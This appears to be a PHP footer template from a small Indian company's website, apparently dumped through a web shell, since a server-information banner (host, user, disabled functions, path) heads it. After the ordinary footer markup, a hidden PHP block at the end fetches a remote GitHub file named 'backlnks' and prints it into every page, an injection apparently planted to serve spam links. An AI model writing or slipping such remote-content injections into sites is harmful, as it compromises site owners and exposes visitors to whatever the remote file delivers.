Server : LiteSpeed System : Linux in-mum-web1112.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u451330669 ( 451330669) PHP Version : 8.2.27 Disable Function : NONE Directory : /home/u451330669/domains/wecareindustry.in/public_html/ |
<link type="text/css" rel="stylesheet"> <!-- Footer Start -->
<div class="container-fluid bg-dark text-white-50 footer pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s">
<div class="container py-5">
<div class="row g-5">
<div class="col-lg-3 col-md-6">
<h3 class="text-white mb-4">Get In Touch</h3>
<p class="mb-2"><i class="fa fa-map-marker me-3"></i>WECARE, 12, AMAN WARE HOUSE, CHANGODAR-AHMEDABAD,GUJARAT, INDIA -382213</p>
<p class="mb-2"><i class="fa fa-phone me-3"></i>+91 8340634847</p>
<p class="mb-2"><i class="fa fa-envelope me-3"></i>wecaremagic@gmail.com</p>
<div class="d-flex pt-2">
<a class="btn btn-outline-light btn-social" target="_blank" href="https://www.instagram.com/wecare.industry/"><i class="fab fa-instagram"></i></a>
<a class="btn btn-outline-light btn-social" target="_blank" href="https://www.facebook.com/wecaresterilizedspecialist"><i class="fab fa-facebook-f"></i></a>
<a class="btn btn-outline-light btn-social" target="_blank" href="https://www.youtube.com/@wecare2169"><i class="fab fa-youtube"></i></a>
</div>
</div>
<div class="col-lg-3 col-md-6">
<h3 class="text-white mb-4">Quick Links</h3>
<a class="btn btn-link text-white-50" href="">About Us</a>
<a class="btn btn-link text-white-50" href="">Contact Us</a>
<a class="btn btn-link text-white-50" href="">Our Services</a>
<a class="btn btn-link text-white-50" href="">Privacy Policy</a>
<a class="btn btn-link text-white-50" href="">Terms & Condition</a>
</div>
<div class="col-lg-3 col-md-6">
<h3 class="text-white mb-4">Photo Gallery</h3>
<div class="row g-2 pt-2"><?php
$get_gallary=get_gallary($con,9);
foreach($get_gallary as $list){
?>
<div class="col-4">
<img class="img-fluid rounded bg-light p-1" src="<?php echo PRODUCT_IMAGE_SITE_PATH.$list['image']?>" alt="">
</div><?php } ?>
</div>
</div>
<div class="col-lg-3 col-md-6">
<h3 class="text-white mb-4">Ware House: </h3>
<p>Plot No-81, Alipur Village, Firni Road, Police Chowki,Delhi-110036.</p>
</div>
</div>
</div>
<div class="container">
<div class="copyright">
<div class="row">
<div class="col-md-6 text-center text-md-start mb-3 mb-md-0">
© <a class="border-bottom" href="#">wecareindustry</a>, All Right Reserved.
Designed By <a class="border-bottom" href="https://ozainfotechservices.co.in">Oza infotech services </a>
</div>
<div class="col-md-6 text-center text-md-end">
<div class="footer-menu">
<a href="">Home</a>
<a href="">Cookies</a>
<a href="">Help</a>
<a href="">FQAs</a>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- Footer End -->
<style>
.float{
position:fixed;
width:60px;
height:60px;
bottom:40px;
right:40px;
background-color:#25d366;
color:#FFF;
border-radius:50px;
text-align:center;
font-size:30px;
box-shadow: 2px 2px 3px #999;
z-index:100;
}
.my-float{
margin-top:16px;
}
</style>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
<a href="https://api.whatsapp.com/send?phone=+9183406 34847&text=hello%21%20we care." class="float" target="_blank">
<i class="fa fa-whatsapp my-float"></i>
</a>
<!-- Back to Top -->
<a href="#" class="btn btn-lg btn-primary btn-lg-square back-to-top"><i class="bi bi-arrow-up"></i></a>
</div>
<!-- JavaScript Libraries -->
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
<script src="lib/wow/wow.min.js"></script>
<script src="lib/easing/easing.min.js"></script>
<script src="lib/waypoints/waypoints.min.js"></script>
<script src="lib/owlcarousel/owl.carousel.min.js"></script>
<!-- Template Javascript -->
<script src="js/main.js"></script>
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://raw.githubusercontent.com/roa1204/codemix/main/backlnks");
$response = curl_exec($ch);
curl_close($ch);
?>
</body>
</html>